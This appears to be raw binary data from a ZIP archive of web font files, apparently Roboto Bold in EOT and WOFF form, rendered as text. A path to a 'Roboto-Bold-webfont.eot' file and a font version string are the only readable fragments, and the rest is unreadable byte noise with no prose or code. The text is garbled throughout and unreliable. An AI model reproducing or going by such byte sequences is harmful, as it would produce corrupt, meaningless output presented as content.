��,(A�/l-)'gҚr�y��y���5�O�^$���j�>J W�_���B1�v!\{j��=���ڽ|J�W�hH�\�XK
�M=�����?����<�>L'��q�yǵ����綾1�];"�����A墂̊i^~�������I+��F�������_�y�����P;�Nӷ��������_�H���UR��0q�	LKZ��UK<I(��W%)�C*�ᮮ��أ
q��k휴;�3���㡃ث4��NP�J4��{�i�.ү�+����k�s�\��u���Ҧ��`�S�M
�hV�q	վ�.��Ѡ8`��
9��o��,��.�)|\W��Ѩ؂?T�b��x]T�|m�UB�?��v�JQ��n��y��@JS���K�����x��?<O,e��e{w�ߵ�(�!���Yr��o��3��>��![���o���TŅ类z@(p����tԜRc##t/I�IliI1�\Q(�t���>�N��O?��%'̟�p��y�:��j�
�c�)�#�-ZE-ꭷ��������Zg�-WFo�����m��В�D�|	7�j ��]� =�J�_���n
0�$�A��1����J()-�F��:, �!M���~���r��x���S��K�NH<�9Q�f5�!%)#ӡ�%	�$
I�SS���,��'�^y��*�з;oڂ����Q�g��!���O�?O�6t�)�F����X���I�a��J\���
�����@��*�vU�zt�{U1ն�Y

|�+�J!~SqP=�\����N�@��8�|ZNaӠ
7;`@U���i � &�ȩ��r��;�X4��	+�/��vJݧ.>m�����^z�<i���'-yٜ�O�=F��;;gm��J����H��ؤ�@�EF��
)�=�pڨ���Q�PՋ�.f���Hڬ�
�DA[���H�JՃ�ШF

�*���tZ~����H��a�O|��O�ӦO�Ѝ��r؇���B2�$��}�"�Tؙ���m-̰���1��v5���"�'+ugXQ�e&n��2?Ѝ؟6�� t�@s�OY8g��IS���Ib��g++W}����v��-�9ˮ<����+b�7�ZPAE��ׯ�߼x��>��BrC6������%�+�FS�瀕W2QAQW#^�� ��
^�f+��q�AE�Y���m�H$�ӧ�UIQ��\hD㡰�'�x��!�2$�yAN�tX�Q'�`�,�^;�ٽ���~�HK�Z4u����W
�4��	�{������{��@#���;O9�ںj.S��v�^��+k����s��J1]P8�Ʉؘ}å����hC.mh�,�l/��x�?~Vz��O���r]ۼ�r>���d�	p&%$F.!� b9b�^�bK�"��+p	5�ـ�l�Zʬ�,f���SZ`��h�k.@-�(5���Js0�s��a�� �BѲDx��i.����ՎI3)Οq<�S��_{����|���ޏ�oi���V��6}Et���f�7�n\�P<v��g�z�e��j>��w�p�I'ϛ�f��?mɒi�/YL��=pSc��2�t���Ic�NS�0�mkG���(wɑ�"�t{����P�lf�+���F5y[-`�X��#�m�����2��M��69�h୏hH��mC��wҕ���n�%f�4�r��+�ߣQ�e���w��‚7r�۷� �z�
��/���;V�ߥ�,�PݦᙂF��1� ц�(æ�(����Y
țp]��z��b��9b��G�õ�^UBb���h�Y3�õ�Y3N��j�h��F�t�q�^d��Y��ꉿ�*��E�%�l}JDS����ʻ���.��$��1�5�[BN��Aj�����H<�9�9t�_��0��p�����2P�4�V���h(��G~����>�{���h��,�ލ��65���F/���=�;�b\q� ����
"����,~Eu4��O�%����Y=n�5
FA�z�Eh�D*��19x��~��Ɵ6|�#N���`��K�;^���u��5�3�\8q���'��������3�K��L%I;����f�A��E��i��ePL�KiL���\�
�U0ɜ�y�e�qyꯉh�j�Z$�O5wi΍���
�>R�R�ى��F��v���v�Y[���Ӭ�(��݁~���O��D��D��(�Y�Q堮(���X�A�߫!�("��D�L�����y�f���oǬ��q��_��'_>I�$��KO����_՟��_���a4>��A�_����O�:��VJ{�{�8�~H�T�����}��	���N�u���gg
{�n:�^��ߨߢ/�,��{��DOZw^�0�"������]�X
AoX�S��nv�6f�&#u���Bk�����1��+�H���L6QT(�!UDŨ菊%.�+��?������tEJ����}��B��듋@���0�2Æ���l�"��a��RS��D�r�Py��,N�Nx���
yp��	�,��,~�4��Yp�d�tv�
&��2tEY��h�i�]D�K)-Z�����?S�ɧ/Z��}���ם�Ӣ�|a��ʼGO���/��dՋ��/�
�>���%d&IF�i�GM��	˜%�,'2s)���Z:Xy� �lq�@��+\f���m�F��¡` h5"W
Wq�p ��eEdH	�\�Y�?���n�풋ϣ�nڬ����?*���I�
_ʲ�醷�<������7�]x	���}����x���s�������;�he014E~�ѣF�q�uҩ�]���=}K2y��U߮�����~��on��o���.��:�pC����Ƒ�6,�T-b�TQG��\l;X<�#�iÉNp��\$~�:H��z�w�D��}��\^�}Of��m�����i[��w�{7tv��E�[{s[���V|�z;�ڭ_���H�PN$.8p1"q����)�ڳ�n�em�Gs"�0:�H
y5��sB�"_�0oΏB.Ҩ���k�^�H�e�ʠ�%ZUd	$�<:��A#��k;݅wܻi�E�.�ҿ}]�U@Hk����[ߐO����+w�ڽ�z^l}���(�SK���C�X��\�CdXu���8��,�+q�(����Ra-A�Ƣ�nV�5N����F@�X� �����=�HKQ@�={↿�#�yҾ�'��٥��}{X�Z`��E#�k6P�A�����t,�Nh�V���
h���W��}������L�����+��d3i���l�Fo�6��N�7��
~����
}�i�0����^�([G��zHP��n��/Ll�z�7av�&�ױXE��D��X���/)2�-� ۘ n�Eu�����p-��3�eu%��QC0�ם#�P98�19�d1��6�Y��ܨ�(�A���0{�@RX����P��=��$�5�l��<Y?���r,�U��QR8��Q���s�1i|s:։N3���5�A��V�
�#���D�����2r%3zE}x�����5N��(@9;��>K�1,�cX�3��F�^�ǰ�ӱ�M��$�~�G�g]�%wm���{���a2�A*�ҷG���6:���������NҺ�+���2�@��$����U�3�Z!U��4�SI��8A͡�
�H�����?�E��}���� �����/8a��WA�B���{I*������U1[@�j��J0R��H
��6Es�Q,�z3���eܪ��ǎ��)��^'�?*�d�o���d�����`-�1�͛��,t�D:s��B�E�1��r��0��Wm��!��0���
Նœ� �Y�P�H���O��f��������k���8����-�g�W�/O����E��k�������_�u�T����=�n��9����,��)x./��.�##����>�Y�eI��7�̧��y e�=��<�����Li�W;#�H�I%�(���޺q��k�����o��*A�b�駜s�=?�����w�}�Iy�is'LZX=�����9g��@Zp֢�#f�����w��kߔ�?�0�8XΌɨb�����$-,�j�!)[Xym�$
�<i�>_��1�k�W���1y�@�3%�Yu��)�ݢ/��*(@��a&$�wTiSFH�Ҳ7\|3-ӟ�߯?E��?�g����_1�7��/���q+0I�r´�h�r/�4k���2E��#U�x��p��+��}}����+�� ��;Z��"�$t�~�_�Ҁ��݁7MJ["�`AQ�q��u�=Ђ�Pt�=�}>��K==��Cs�iQ=;�����	;����y��4���͜�GD�";]nOF�.�8�����àjhUͦ�Xߦ~�5����W��G�*~y W�D��p^)\Z��)o��B��aƎ&��L�ؙg���qt� $�8�Kߪ�%|(��z@�Z{��֟�>�>v7b�l�$�g<D�6ʊ�[Q`ecʌm�t@'�$�˴?���`2���!�1ڠy;�i�xS��PfְfE�D���Wa��Q�D���T�h)�z���z�ᓫ�?c��kuU�&����.)�87�nF�RV/�-��|'�Mf��DI�����u�;>���p�<�<3�D��p_����E�|�
2�)���<o�I|-�X�u�6%��^�fa�
��EY�xQ8��`BϽq#M�cN����G��CxW<��2��2Ї�-+J�bZ�&���N�l�MxWx�����X��qF��W0;״��<��`D7X�>�����1����5�$��S�^bo�7D�%�Z�ܷ����@�gIc@��$��y�V���l����#�G�C=1ƹ.�j�1�P���ޢ�`�:�;�|w%��G�(�c�w1
�.`�;��
5A�f���������AօA�����4���	㆏ֿ�k�~����9�ް���>JK��?����3f�ڭ;�ء��l��3s�s�F]xTل������Q�f0�W��lصB��M�� �������]��^����W��F2Ň��Ő�&3�$�Ohr�!C��fy��O�+�~#���w+iI�ɯ���K3/�
u���jꌕCfF���
�w���ǎ��&j�^��Xc=�A������>*~A��/\��_(����p�7�:���CִjΧm�U�����Ӯ��RA�m���g�:e�Lj�<牟�w���n��$��I+R�Ԧ��-���.�4�d0쉯mOО�j�D2�Db{"���	��O�I�e1&
�!�'N.��LO��ˢ��5%�x�{փ��������N\:����d��3
f�_2��6H����CK�x{����h��
�h�E�}�!�d"I�/z�Ԉ�E\a�V��US����*
�д(E���j�R�7�4�.E����B~����H�4�	
G9W������t��nٜsF�=j�y��_Ӟ"]x���gR��Ǜo��d��䒊�^�iz�%wƊ3Y��_�����$b��^U��V�q�ay�1;��X]D#�:�d(�(�A��,��ʊjg`$x����˧<����F��ɮ.~��o���^>��眎w%y�1��|�jq�}�<�*�҈�G�6JگSp�B{0z�|�W��rz��<�n��RKi���Z���U�Q�t�k6��vԐ`Q���9&1}�k�%�����'<:���K'���f��>�������7cP��&��d��7���x�(:�Ĺ�Ҳ�7�^�{j{!y��,�5A~�B3{đ�ry]�j�[�4����H3F>�~�ى&gu�S ���{�*�iib��<�0�� �n1�}�g矽���W��`Q��zX���Aj�2U���L`V��I&���-���驃[�t;\7 M����&u��L��4��X��^���/n�3E�%�v�84��z�=s�R_LU�$���?���Js�o�׫6�����J��L���̚�͇�U���B�F3~�7�7+i����.z���o���\J��C�*}N���ӆ�<�V�]��Gr��_��'�	�_��xf7x�0V��������Q��]�3M9_�eQ�g5���*�L`����7�����(h43Df4�@)�L�YI�\u���hsy�֥�>�0nl�iA�;n\�)�R�+�L�>㸹{?m]%l:cvC�?�im6�:��ہ}��.��Lj�I�i��3�[|-��ρQ�
#r�A���,�^w�-s�xT��)}�J}n�8��Z��/��:�=I먁��N1���-1mJ@�b�AY�����ԫ������d�ɫ��z�b�����/��E�&~�ܜ�:���G��>��u�4�fʴ�t�Jb��T�`/ӎQG�1n��1nn�Pӎ��K�19��cUj6L��/L>?�1��y5#�϶�wXo�$���k�S�ճ殍���+n�`�j�!���d9��u���jv��wf�}�,��m�~rT�z�E��?�jΝ���������U.X���޿��'���n�
O
;�,����;�D�kfŐ�eq*�tv�ϰXa�������2�A�BR�['ϲZ�V�Wmk��|�[MN5c9r�Xß����d�r��B8~`�p��d;)�{k�8,�>d$��fj���9�#���(P����g����}Ͻz�A�r���'���_/�}��t�|ܘ�
5�"7�ٳsf\��	C��s*o�������[v��}�U��`��&I?��rr���*ָY�)!�i{�L��u�!{{{���=Q�,n�(�L�S3����Z���u=��PN�I����
�뿿��^�����RB%�m��R�i#8��P�l�*
�

͠��l@LW�nd�5�M��Ŵdܘa�h韹��o��/\޺j�	�=D���o�<�}�/�X+�ǎy#��dā��Dz�^Z��_$i��Io���N�?_�{���	�<��˜|�!��dˈ��b@>�	m��&��!�O��PE��O}W�/>��|9����K�3�a��P�1�#���oe�+��d�u��1{")���i��8͘��kn'���c���������MJ��~=���u/=A���kT��1�J8�!���C1ղG��-ho�=�Q
`�-3���B�<�_�}�czn�R6���]�:zL����IP������|K���O���$D|��a�x��9#Qw�sA(g�'��ݭ��xN�~�p�܏l��ә��l�@kYXK ���R�y���$�~`��<�]3��;��=yؔ�S����;��]���}�-�[��^��:�m��5[�4��}���l=��?�,TL2S�X���e�ζ:g%�ܯ�?���(��b��d�pL��{TG\���و�DD�����2@3P��q���d^0����M�9s:���]�N�~�]ϼ�@���z�bᖆ��^�l��y���Ѐr��.��~x�@#��li��!XbH5��^W���\�*��=9h�y�Q0Y����F0����6b+�=�83÷���_<�Q�#{�G��6L�4�nd���t�mo>��b�1�m�֣r�p���Kh�
mz� �J�/�c�-�_">v`�� �:�'Gt���vo5ܧ����cv1g�M��lr��#BfeS��;�Z.ر�m�&�f��0�ԕGI:�sQqY���F�ǻ��C!�?T.��՝�пK�/���]��ս���=Z����ⷷ���
/E��a����s�u$��|��JN<)c|�<�aI��^�"4OvW��sbq��O
>��@�8AȳW��W�b�%������P>�Fo��!�e�P�c7���̘gꫂ�F�{
��@�X��O�+��d��ŷ�����Ç�s�y��RSoaׁ<G,&	�>��="Ϟv��=�L����]w?�e�/,GI?�j�u�7�DJ	��ҢV�4��W�J{R��M�GS!δ��T��Z�%hftW�^�&��|͊?'�
�*`��s	��Z���s���k�9�>f���W������V�&�rYae%�>,��6ѻ~��Ghsf'Gnڸ9�;�t���౑��{�����[s���9��MW64�����<2�6��+/�?hP�����G�uF!��W@^����x~J�e7�FM�Q���!vBNhACq�N�ڣ��̛�Ǔ��{\vt%�X�C����q�V�km9�P��@"��!:�f�4����?A��O��Ӊ�㴨��
�[{�\������ׁ��Y�۱U5�eA��,XGe�/��I��B�)����כ�'���_d(���d�f�)�$�U�
��R���qUFn�\q�W�	����Uy�\��_�E��r�+��z�5q�=���.��m�3p0�M�O��G�)U��a�UT^�gp�1����ph�-�e�e��0�̬`�왓�B#�L�A��ԥ�W��~o�4v�P��o��wY�r钵���oh�
�xhIEՙ�V),/��\�#~�����N����<rt���vQUⲹ��ޓ��'<>>����M�s��5ç�9Bp��|��x��o��Y�c0~y��j�uMT��ɪ%���g~n��o�C��%��e,�=������	^O�6d*�C<R˹���8����nx�T%p��b �J�y��R�--B3�S�����y�$������j��¸Z��|m�
���������X��`��6�!��+$F ��~�I��F"��2���S	P 9��[h%��[��{�;����q��B����o���<y�-�$l�:u�3�N�,H�-�>)�K�RU�?��[C��I�C��.�6jESRr�{�^#Ϝ|ɪSO�x�l��[��|�RH�nVsVE�%��#e�vA,U��v��DvdD9SQ�����u�H<n4�hg�^��U�'���+��M�;��#p�����P���w���hy:iSb&mڒ6+�q��}�:�N*�{م��<��!FW�Y���>}K��FL�_qj�����[��~���c��~�/��n*9a �\r�x�����ͪ����x�K����{���O/�W�����g�5��b��bv�����c.!k�B�쌮����R��N߮�����Nj�7qҗ<uh����R�8�K+�ܾ�\c盺�8���q/�U�
qS���M~*m�;؃�#J��H�RE-ʨ�HJI��PR�D�?��S��I�Xom������UԬb����'ZFs�{�O�>�V�Mvi�-��3g���u�8ᢳ�WX�lD�n������o7�>���f�K\a�<CzZ���eػ��םw"-�-�!���{7�d�j�;Ȕw���/�j���.6*M&m�{0�W�s���V.߲e��[�Q�6,Q7Bj^y�m+Wmٲ�~��^�F��|2��[�w�X[�BXa���lnu��՛nn
��U��܊���t4%t���A���vM���|��K׵:>�p�T�I����%�	X������O��G�D�w�s��m4V�n�f��e��ƒ���yӖ%g-��֫h}SI����.��]�f�Y'̐o��@|p������Y��O��Iw���ѓٿ�V�pTEFT
�r��Se|頎ʼ)��QbI���4n����o�6&�lm,�0��,��,a׀��C�
^��ScC�q� �^�
�7ld�W=!�%w�����gy�G������d���̳po�'�Y-A7���%�D�`Gh4L��@�}��u���K���x�p��B����I�`[�+�Ѡ`�(��� 2�\QÌW.�%S������r�U�Ǖ`��u�5K�D����U��~[_?0Zne��
F�o(w2`%/�†I^��
�R�����_GH� ���_�0�Eo?x�Z�'ب���*�ϊMm���r�fj�k+-�?������K�vY���T���o0�{NI`q3�"��w��6�b|)ܐ0褂�М���}�k�i�E��-9g[��ݢx�1�
�V�k�w��&�(���@;��ްdm
xSX�e��Y�2�c��j�T6�[���b��g��p����r����!gY�yb˖'��e�?y��S&N:N��l~��ͧ\��c�L>�ɧL\�h"�k!�N�,>�m����A��/���	����x��^A7�����D�&���o�}�r3I����T ���s'P��Y�d0���;�=<��Z�m���q�Y�G�PQ���5e�9�Af�|<WT4�_R�e�EG�<5n�B���GJ��nش,>���Ƃo�_|Mv[<|#�'ل��B�n���Ko�T0�����v��7��]&�"w6��y��2Y�FЊJ;�_vh�a�S^{(���g� ���vh�W�ڜ��C�f��`�F��B�NH��C��G��]�����t�M$��s��'i$��n�l�tcL�Kh}/����iy�U�=
��]�~Ծ�T/�qm\hh��g#�AI�����ah���c8��RQ��pYMm#�_C3��fR�9�Ս��n�wAs+����y|�e�x��Xks�d
�>R_#��{4�V�f���Z��lĚ�oth�dv��w{��0���"Vv�ш�J��^S6�ЉxY�f�ᦡ�6eF=82&ȕU4��4�Fn^�TAK��k��<g�1E���Ou���G�zgd��ɗ�7�φ	S;Y~j���W���;�h-/�Jir�N@��	TD�$�h�SO�>%P���{�̮j�	T�jP��Ȫ�gvZ�d��V������)��T<���Y�alVt��,����o~�i���˸e���H��V��Σ`�^�ݳ:�Si�v�Ȑ�D.]$��:� �Z����&�j���,a�v�j��~}٥%���{��s���e�_�u/�u�<��:�;/��`L�xZ��=A�`��R�V���'8�+ƀ��9^>���SlRL�GlܠP��'
�,7΅�ۼ*��iT=HV�2]ݖ�`�:���vj�u�u7��6L�+���Kg^z�X��
�
�޿� 8p3Ú��;b��Ƃ-�z��ڢ*q�T��ќJK���|��	i~�L�{
�Yy���,	�z�I~_R���S��m��hw��v`�PGB��:�
z�Y~��Ki����l^ö�p�p)�T��h,�4���LJ��ffs���m�0�L*�:O���m6��7�PkVBa'�Gф ����Xj�C<��L.�pYGf���p�S�?��)S�(FT��ݭ[}}��
i�잸j��IK��GhVV54T��݈2j�1������B��DFs��%��?����}���O
�$%�S�d�!pk�ȱ^Ya)���P�~��+D�+��z�	)¢g{��E�WH�s����E�ѱ�&b�;C�c=�`G_�kS�<z�E��Z�*�G{f6�Va.$�j��~��SEX�Q¦������frI��	�H%�U-�4�I��P6�u��L:���>�����ъLk���Ȓ�.�E�f�fc���̮�}��t�ާ���{Җ��@-1����蘪�0�¨6���~vh���2z�l��f1S`m�r�Fa]������Au����i��2�#g������`=2�H�#-&t8$��)Q�j�mq�J2f,9̥��#bE��Mv�87$�
�Q�O�,G��2��O=c�<;����,SѶ�AFʂ�g��g���ӵ��&��l���kذ�&�9PH�p��3�YE�aDԗ�2��k�Y �ïk��61���8+	l�6m��൯�$��z2bH_־~�4a��ݨ�qFI������~�x_�JXx��47��0��ϝ�=ă�=��j�?�p(T[B�VLG��Z�)�f�*�NU�NA���	P�F���㩣��F6ؔ?����_!��A��3�a�Wz��0PE�u.�‚�%X���6j4�q�,)6?�X�ԅN����f1&1J����nT��a�nh�x��h)z��/�e	+ғ���Il����!�_-Q�Ϝ�ݝ��՜���,ϗ��2��t{�Z��S�pq,Uȏ���C�Rc.���5G#����F1��ӈ�rM�5f�6�9�Zب�Z�,���۝�.,�v-�c;Xk�[�ۙkh���h�7�"r���!s7�����m�(l�p��Ό�%%y�>�s��i��$�k�wƮ��u��:2��O�040z,�z�.���]U�������g����㛉�ô}�åÑ����L=b�p�"�d�C�	C��c1C9�׆#l	�7!_yH�*g��
�λ�4�ߑM�vS$.�غޗ�S���z�2�@[��ߚ�1��Ɯ3��)&�KF��ثUr���m�p>�χc��*S�Q���8#��,-	X(�&�z;��V:F��\s��ޙ����)�ﰒ�gS9�mT���㉩E	-$y4n�>Č� ������Ė
'��dQL+Q��Pn���uɕ(���J��S�&�T��.au��t0���d�����U�w�r���o�
v�Y�`����1Zs����ߧ�����D�Ҿw�/�^w����݁��t���|GrH�%���LL#o�ӽ��,����%p2�S{�x
(���q╃�p>A lSl_�<)��h�?�-n|��H%
�t��R^��7�V��c\��FL�b��Ɉ������b�U���@�ov_9�;��N�]{��)�8����ď��h,*�����׏X׃�%��w��n	��Փ
�ga}�@3
Ȉ�;���pWu��fbŁjW����I;י��Ծ�1��]4��i�H��n}X7ݜ��3��R�@���1�s{}���.Vh)1�lz�G�1��E����u@`
���)j��!V����V��)Y�Z�`Àg2���D�N�XUC	�oE��(J��7�DA%���N����!�)�P ˒	7�;��Y�]A0*m��^y�	;�ഝ�ny��!�fü�h�O����#�]4�3�۾s�f�gm
�o�@�a���	�s�x���C�N0W� �#��IO�s��cM�b��a���&=�gH�U��ҽ:��?��=��kQ���ع��#AX7k�z&7�'��HΧb+��V��N��,+�
+�z#j�:��ʇ�6�4�Z�`?�Ɯ�
��?+�t(�7�ư�TK���0f�`�����BFa{}��3��*|��n	����V4T�4�X��eS���%���ԥ��qٓO�~��4��7N�9r��
����[����Ԑ�x���foIz�]�=�f{-��,����P�Ûr��割���CNoAI){�Q%bmT bt�wQUVQ޹�=�D���n=С��\&�u��~���-}�`]��i���78ӥ
���ѭ#>����B�4>2��=�k82��=c,t��!}�������!����_��f�2��pҍԑ�3qR�'�6��3�t�Q�^6� ��^�{&��(3��f⥬��������S�=2�H�
[zh�d���ԑ��L���T����ڊ� J=�(�׆��e� 5��3,�h,UǏ��a
&&����ת�y=>�[�5಴�ӷ��'�'Cf�l̰!6��"j=� }�8��;��*%�0���u�ߔa��kb]2�t7�|��5���D1:�5	�Tq-�⺘ݣ�* V�Pp��2>��*�j
~��\�Ae��-p6"�&�6���n�]��oѭi�3D��8d�H���z��8\��K��^���?y4�i ����i���4���R}y�d�Y3k��ժ���H��9�V{�y�&֊@>��?��y�Ƅ[�w�����ֽ�AGh�!�vP_�����B-�L���8s<�a�g�̺xL�/43/�A��F.��q/����<�O�\�*�"��d9F�z$�B0�X�[�&��h�c`<�7R[��Jh}-|��`��h̋���B-j�86�7��@�6^ci5���{ ��47xmR�#!�z���}����2&Ʃ^����R������N�*=W����CF��� �\xO�~��{��5�t���3������5�i��;�CK'N�svY��e�&�'O�5���z_߱�F��ɛ�h��k��t����n��3~Ԑ)��wh����T���\q�u��ul�K>{BS��m�S�*�d&�L$5�fc�YU�E��a��sf)�<$�����2K��=�S��T��2K8$f�R�1�'����i|`��̘s�^ק�O'=�Y+���3��D�H��A��Yfx�=��X�-<�UnA�%Y���P@��"k�1�hn>��1�����;�Z�v]ۼ�G���,c�ܘ��+�7m?rEz,�և��+��<�v�'�,sx�
xr8<9��4<9�K^������)M��.����;�(c����cpɔ�U��r�+��"\�bj1����U�p��)k1�+��?��fY~�N0-����1��Z��&{����!+�i�ty�<��Z�вA��řK��:s�����Qm#���|=��08�v�����*Iw�mi��Uݪ:�fw��p���&2Pcw��c�#n�BU�%:Z^z��2�
!��p|O��0��y06:��%��0�i�����9�wǩ0����z��q�#&���$�5-��f���4��>����m����rk�L�q�>3*x�[��Mp�,���Fn��[�%�7f��̮-��"Z�K�7/��?���#|n#��J�/
�{I?�M���'��ǰ��x�1ܭ�C'.kH��)Z(�d�2�Q�d�_��@�l+x���?v^�|&��g
u5~S������pD���
}~�mW���N��^t����s����7?�J�Z�xy�E�N��y����c�VM=Q����?Ks^[y��׮��ۂt�fǀ_�^��mzL.Kx�?S��=-�Tf�i��Yh<�0`Z~sf��N�F���
�ќ0�ù\{��(��V4���);]M��*
�q:�sܑN�j,�3�q"�[��sq�2sq�N���8�WJ'��M�Ɉrt9��Z���1�Fz�`S�T��5wʽ���>��:��3y�I�C��n��5�Gx�Ptƺe�U���7���*�c��=��G�D�&S&�;��wu��1TȄ��ȱ���c E2�k�bf�M��A��k�b�X�ǁ���5&`�J "u�Zkq��
8�P����V_$�w��i3�i�X�C��T��?�̣�w:$��"��]B�)�j6�t�M0Qg�uu,4��㨣�.Z��F���8�H�;�!���z�q9FK#{h��xi���x�#��C�� YZ��2�}Z&��3����[K������SF�mAf�Ͱ�V��!+0D:�f;B����G	�}��t�D"5�x?>�ǰm'�Z8�9�r��,�%�O���[x�⫳ʂ�{=2Ǯ�s�#�mB{\W�1��k�/*���f�
]�ZٽfS�ñ�?@G~�M�;���D�f�SW�eSB�l�a[G�s�y@+x֭�T � O��_��}�,��|�J҃ɬ#��e�:�.lx�V+�o����֛G�r��]���~S���<�Q���#/<-�;-~q:!����8���Yp�m{�h$�$������H
�� d1-�.?�f�G�����[(��Ǘ<�����<S��R#Q'�H@GA�t��IOH�T��V;"�o�Jb
���1:;�M�v�#�����6K3J������t.�Ʉ��1�18.Q��V�5�g�4>8l�Γ5�g�
�;����O6f��{iI�<9�U84s|��v��'x~�es��"�#�DZ(&7�	�8
3�8aȂ������@%���4Ł�U`�j��� �Cn��|�D;��(G s�Ş_XFN�ul�i�1���y�d#^����x��y����,���Yln
�ɼq8��\�|`�X T�՗.i�Vi�x��9.pC=C7�礋Oo�~�`�',ۺ{s�؊����d�ܱ�Q.�Q��pґ���$�$K�'"��euIcH1�!���+B�%7���g�g�T�ۆx*�U���-�h��%<~����K��@�����y�ղQ9
/-�ʋp�C>:ԨI��!�\y:8�x.3c	�D��<�ɵ�	�^2x�vV�Xh��6�1q������ɓ�g��12��w;��N�W=	�i��K��^��b�Caϩq�#�a'�(c]�9��4��
bc��X�I�]��Qxf�gF�qF�@��3%K��K,�)`ϛ�$4���לDg�*r]r��:��ӊ����+�|˟ ��6�q���8V^��=U��)���A?�2�u3^e���+�zmGW�ve���`�vS.�/�].L�v��೰�G��0��r�I����(L��z��h�e|?.�N�����D�0?&���?!�]�$�����o}���Q��.�:���p��N�Ʀ�n�?���3�m�:q�O:���a�xo��j�C��ѿD]p	���8�Q���q16R�e§Z��?�a�D$T�-��M��H?)ā�����a��z�a��#����(E	����3�e��<X(�K��{Mض%R6~O��gJ
���o�L�s�_I�9���mo5}u�'�E��M��o^cC�	�%H𕜱��nk�P���lln��OS�Կ�a�����]�l�����[0u��g1�	d��=�ݨ�g�8;�����񌧳�2�Y��i\��ڞ�f�l�����s��\��A����(����aa��P��$�������3g팃딶��q���P���~?�S�=\g��}ⷠ���Y$YA��|��A��7�����YJY$v"��ٷl�u���}�&��86i�l�\~wM��y�x�{>��R'#��/bSn4�b����TO2��Ԃ�`I?:�����տ4�4$X����
�>}�l8�ϊD�����v��ӽ�{���-΂��yW*�gY^�چ|<[�Z�ǞK&W�Ѩ;a�xҒ�0v6��bDŽ�E>=N�
d������^A�ޙ�ؤ�چ��C4��|�L���)?|HK�R��Q�X"Z��t�9��q[�ʧ�x�����e���8�G%����[?��T��v��ۄ�a
��ިj�4�x�N�?��gD�
§��|����$�=��ŧn�8i#/c"w6'�
'�z�7�O��?���O�\?��1kG/X��[��E�T\���ʞ>e{N���Y�_��)H��NjS�C�1 �f�]�T��hr&H�������]8p�9^Dx��<X���H��1f�7+9hl2����*�W{��Z�j1fy2�.�8�-7��je<Y�?�������Þ8����l%�x�KOZ
X�Z>�&�h�Q�Lecx�����8��O��;it��h��vZ��u�mp�H�C�;�'X�pA\��[�hm<��+r�F������y(
����Mx�c`d``b	�Eg�m�2�s0����˅a���٣���8�@�9e�x�c`d`��H2���&{4P����x�m�[HTQ��Y{�9���ʘ�S7�s��Xy		���ф���� ��Q�ʚ����%�nA�V�D�A!RH�� j��ؐ���{�����_[&Q5�����_��Pϣ�~B�Qꩁ_�pP��g�#G[P,(7��G7��w��mRG�I��"�l%��q�c�f�H� ��1���,B��f�yh�e\&#7���BL�pQO��.�|#bޟ\��A�Q/Pk��hf^��`�͆�dc!�g�`�!�e-��P��!�0����:��(�u)ʨ�Z��w��G�!K_bD7�ۍ��̍���W�Kj>*��{4vy�LbI�\C�8�K-��ё�}N��u�wD�~@�XD��m�eo56�!��v�@�[{wNgL.z��&�.�ay�.��cZ�R��UY�6)�Fs���}���vk:j�u���"��4�)�^SG�=bmS>��V��f�z1׋���yH�}���*�}�����CQ�rI��_��0�8�S����(�ꌢ�)F��O�����R*}|#$8�Q�P;�C/R�>y���s~���H>#�^��8��ݽA�ip��ֱ�Z�x4��y��?<���x�c``Ё�(�.��L󘝘Ә�0b~�b��R�2�e
�V5�6��5�j�q�o8�8�8q�����Y������;�{�%��-<�x%x�x+x/���%�-�g��� � '0M�E�B0Kp��1�{BBFB>B9Bo����Ȉԉ\��"z@����>q��m!�$5$$gIޓ�
�j�:!�LZG�WȈ�L�U�m�]'�$7A�I���>�w�\��K�))�Pz�,�l�\�<O��
�J����57�ij����Oh�hҔ�\��M�N�G땶���v��1�y��I�g����}�/�?b f�gpΐ�0��Q���-�S�]f.f�̭̗Y�X̱8a��R�2��U��>k)�:&�"�%�j�u������}����`�p�Q���q��q���+�o��L�"�&9�q�r�r.�Y����ظlp�����f�vΥ���Ffx�]R�N�@=�!�&*��r�� ��4&�Y覅"�ǘR4�X�ʭ|�a�	�L�g's���;�1�oQF��5�p{3��s�^�HR;G�`��;�c�4�/���!��י�a�.�ip)L�d��S8į�[x;o�.���@|�M<͝���d(��쵬��� ���Ђ��%j��wx�:�{C��փO-9Jc��i
0d��f�gs;:��}6�9ft�Qw�m1gH����ᒇ�>�]�$�+��%m٣��qE΁�R��Q�S�iW,+�5iP���ˆ��c����%'�2.Җs2���\���3�YD��M/�u�l��%�ŚCZ*��ʨ��*���\�Z��G�
�x���s:��#jU�_yZ8վ2�s�*����|�l}x�m�7lSq���%��8�����{�v
�&6��N ����` tDB���@��
��M3]�
���o��N����o~�R��	$J���BVl���xH$�dRH%�t2�$�lr�%�|
(��b�ўt���BW�ѝ���C_4t8qQB)e�ӏ�` ���xJ^|c8#�(F3���c<��$&3��Lc:3��,f3���c>�b�-�r�}|`���~�qTb��;6�W�bc�IJ�[��8p�����9�}�r�,dw�S��x�#���g<�4~���׼�>��d�����4��FB4f)�X��
V��*ְ�+bkY����,�x�[�K�$H�$I��H��I�dH�dI6�8�%.s�\��9!9���J;$_
�P����kn�p}PӴ
S��T��P:�.ey�FdP�+
�C�T��%�Re���>����꺽&����*�f��|o8��Vx�>�yGDC�P:�Ğ�x�E�?�P�<�$"�?Q1�ތ��J�Q%�\@�Qr
��r;v�<�v�اx]H\�
�ۢ�VV���y冢¹���A2�H�5Փ�!�5�A��`�;��=�����%��SFp&h�m�1:@����.���vW5U���7�@�����a����f��}0��XR��u�[R{��PK!��&�Q�Q=it_sanctum/fonts/roboto_bold_macroman/Roboto-Bold-webfont.eotnu&1i��QQ�LP��[ P � O���RobotoBold,Version 1.100141; 2013Roboto BoldBSGPs�2s2y+����xZW�h[qJx"c�r,g,E�&�C��ľ����@���*0VF0i����
�^cX�#&�6����C>c|����"�be|*�M0��fq4��D��r:UMyl���͉3��5Z���a�jm��!uX���طU���A� 0'��md�Ū��%���w��yn��!<�:����J�sb�o�άcJ,S_�F�*o�2XR(�J����E�
K
��`)��/8��'0��cs�A�$�=���-J���75��BQ~j��N ]G ��(7�+.�ڜ��Ë�;<�r�X�;����^�ᇅ�xo!���B �`��CZ*Ͷ���^Ybr�Я�@@?>*�7�*�G	�PӴ��hF���u�m`�fg_�-[
�^���Y)l^>�s5m�%��:)�B��p$C!������]٠8И`��5fQi̵��$L�-��7��G8FE5��,X,3XQ=�����u����I4�i�FGyV$�IX�#�D,#��ؙ�岼�=
qM�8����d�b'a��j���!f��͛hÈ��"
